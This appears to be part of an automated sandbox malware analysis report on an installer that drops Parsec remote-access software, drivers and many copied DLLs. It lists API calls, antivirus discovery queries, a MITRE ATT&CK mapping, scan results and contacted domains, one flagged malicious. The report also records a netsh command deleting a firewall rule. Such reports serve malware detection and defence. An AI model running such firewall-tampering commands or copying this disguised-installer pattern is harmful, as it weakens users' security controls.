Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: GetLocaleInfoW, 49_2_00007FF763C5543C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 49_2_00007FF763C5D3B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: EnumSystemLocalesW, 49_2_00007FF763C5D318
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: EnumSystemLocalesW, 49_2_00007FF763C5D248
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: GetLocaleInfoW, 49_2_00007FF763C5D800
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 49_2_00007FF763C5D750
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: GetLocaleInfoW, 49_2_00007FF763C5D5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 49_2_00007FF763C5D934
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: EnumSystemLocalesW, 49_2_00007FF763C54FBC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 49_2_00007FF763C5CEEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: EnumSystemLocalesW, 52_2_00007FF694BCC5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: EnumSystemLocalesW, 52_2_00007FF694BC46BC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 52_2_00007FF694BCC690
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: GetLocaleInfoW, 52_2_00007FF694BCC8D8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 52_2_00007FF694BCC1CC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: EnumSystemLocalesW, 52_2_00007FF694BCC528
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 52_2_00007FF694BCCA30
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: GetLocaleInfoW, 52_2_00007FF694BCCAE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 52_2_00007FF694BCCC14
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: GetLocaleInfoW, 52_2_00007FF694BC4B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 72_2_00007FF6750FC690
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: EnumSystemLocalesW, 72_2_00007FF6750F46BC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: EnumSystemLocalesW, 72_2_00007FF6750FC5F8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: GetLocaleInfoW, 72_2_00007FF6750FC8D8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 72_2_00007FF6750FC1CC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: EnumSystemLocalesW, 72_2_00007FF6750FC528
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: GetLocaleInfoW, 72_2_00007FF6750FCAE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 72_2_00007FF6750FCA30
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: GetLocaleInfoW, 72_2_00007FF6750F4B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 72_2_00007FF6750FCC14
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C04DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 49_2_00007FF763C04DD0
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\drvinst.exe | Queries volume information: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.cat VolumeInformation
Source: C:\Windows\System32\drvinst.exe | Queries volume information: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\runonce.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC022130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus, 40_2_00007FF7EC022130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_004587AC free,free,free,free,free,free,free,_CxxThrowException,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,memmove,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetSystemTimeAsFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memmove,free,free,wcscmp,free,free,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetProcAddress,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,GetProcAddress,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,free,free,free,CompareFileTime,CompareFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free, 5_2_004587AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C53860 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 49_2_00007FF763C53860
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046DEA0 GetVersion,GetModuleHandleW,GetProcAddress, 5_2_0046DEA0
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
MITRE ATT&CK Matrix (techniques listed per tactic column, in the top-to-bottom order of the report's matrix; leading numbers are carried over from the matrix cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
Resource Development: 12 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: 11 Windows Management Instrumentation; 1 Native API; 12 Command and Scripting Interpreter; 1 Scheduled Task/Job; 13 Service Execution; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: 12 Scripting; 1 LSASS Driver; 1 DLL Side-Loading; 1 Valid Accounts; 35 Windows Service; 1 Scheduled Task/Job; 111 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Privilege Escalation: 1 LSASS Driver; 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 35 Windows Service; 12 Process Injection; 1 Scheduled Task/Job; 111 Registry Run Keys / Startup Folder; At; Cron; Launchd; Scheduled Task
Defense Evasion: 21 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 133 Masquerading; 1 Valid Accounts; 1 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 12 Process Injection
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: 12 System Time Discovery; 3 File and Directory Discovery; 47 System Information Discovery; 2 Query Registry; 31 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 System Owner/User Discovery; 1 System Network Configuration Discovery; Network Service Discovery; System Network Connections Discovery; Process Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: 1 Archive Collected Data; 11 Input Capture; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
[Behavior graph (interactive image) omitted. Behavior Graph ID: 1555525; Sample: uu8v4UUzTU.exe; Startdate: 14/11/2024; Architecture: WINDOWS; Score: 42. The graph shows the process tree starting at uu8v4UUzTU.exe, svchost.exe and pservice.exe, the network contacts beautifullyuncluttered.com (188.114.97.3, port 443) and ifconfig.me (34.160.111.145, port 443), and the dropped driver and installer files listed in the sections above.]

Source | Detection | Scanner | Label
uu8v4UUzTU.exe | 0% | ReversingLabs |
uu8v4UUzTU.exe | 3% | Virustotal |
Source | Detection | Scanner | Label
C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual Display Driver\uninstall.exe | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys | 0% | ReversingLabs |
C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe | 0% | ReversingLabs |
C:\Program Files\Parsec\parsecd.exe | 0% | ReversingLabs |
C:\Program Files\Parsec\pservice.exe | 0% | ReversingLabs |
C:\Program Files\Parsec\skel\parsecd-150-93b.dll | 0% | ReversingLabs |
C:\Program Files\Parsec\teams.exe | 0% | ReversingLabs |
C:\Program Files\Parsec\uninstall.exe | 0% | ReversingLabs |
C:\Program Files\Parsec\vdd\parsec-vdd.exe | 0% | ReversingLabs |
C:\Program Files\Parsec\vusb\parsec-vud.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-60VI8.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-8G60N.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-9HECR.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-BK2QC.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-BOVF1.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-BUN5H.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-CEDA5.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-DQG3S.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-G4CQT.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-G92OK.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-H42SM.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-H8DB6.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-HA8AR.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-HCV6V.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-HI4IL.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-HQ9KB.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-I39R4.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-IJKK2.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-JRFAI.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-K5NEU.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PSecWin\is-L6U16.tmp | 0% | ReversingLabs |
No Antivirus matches

Domains:
Source | Detection | Scanner | Label | Link
beautifullyuncluttered.com | 0% | Virustotal | - | Browse

URLs:
Source | Detection | Scanner | Label | Link
https://beautifullyuncluttered.com/ | 0% | Virustotal | - | Browse
https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec | 0% | Avira URL Cloud | safe | -
https://parsec.appURLUpdateInfohttps://parsec.app/changelog | 0% | Avira URL Cloud | safe | -
https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i | 0% | Avira URL Cloud | safe | -
https://beautifullyuncluttered.com/L | 0% | Avira URL Cloud | safe | -
https://beautifullyuncluttered.com/ | 0% | Avira URL Cloud | safe | -
https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec | 0% | Avira URL Cloud | safe | -
https://beautifullyuncluttered.com/?CheckApp | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
beautifullyuncluttered.com | 188.114.97.3 | true | true | - | unknown
builds.parsec.app | 104.18.0.181 | true | false | - | high
ifconfig.me | 34.160.111.145 | true | false | - | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://ifconfig.me/ip | false | - | high
https://beautifullyuncluttered.com/?CheckApp | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | uu8v4UUzTU.exe, is-G92OK.tmp.1.dr | false | - | high
https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec | parsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ifconfig.me/G | uu8v4UUzTU.tmp, 00000001.00000003.1960296249.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000003.1956522073.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153836962.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.microsoft | drvinst.exe, 00000037.00000003.2039083129.000002B48D596000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2038432096.000002B48D588000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2036630983.000002B48D59B000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000002.2039476468.000002B48D598000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.remobjects.com/ps | uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.dr | false | - | high
https://ifconfig.me/ip5.1ry | uu8v4UUzTU.tmp, 00000001.00000003.1960625837.0000000000854000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153690668.0000000000854000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.unicode.org/copyright.html | uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr | false | - | high
https://www.innosetup.com/ | uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.dr | false | - | high
https://parsec.appURLUpdateInfohttps://parsec.app/changelog | parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | parsec-windows.exe, 0000000C.00000000.1878859711.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002E.00000000.2008553821.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-vdd.exe, 00000042.00000000.2095284861.000000000040A000.00000008.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.dr | false | - | high
https://beautifullyuncluttered.com/L | uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i | parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
